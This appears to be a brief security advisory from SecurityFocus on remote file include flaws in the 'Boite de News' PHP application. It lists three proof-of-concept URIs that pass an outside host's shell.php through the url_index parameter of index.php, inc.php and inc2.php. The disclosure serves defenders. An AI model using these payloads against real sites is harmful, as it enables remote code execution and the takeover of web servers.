Boite de News Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[Path]/index.php?url_index=http://www.example2.com/shell.php?

http://www.example.com/[Path]/inc.php?url_index=http://www.example2.com/shell.php?

http://www.example.com/[Path]/inc2.php?url_index=http://www.example2.com/shell.php?


 

Privacy Statement
Copyright 2010, SecurityFocus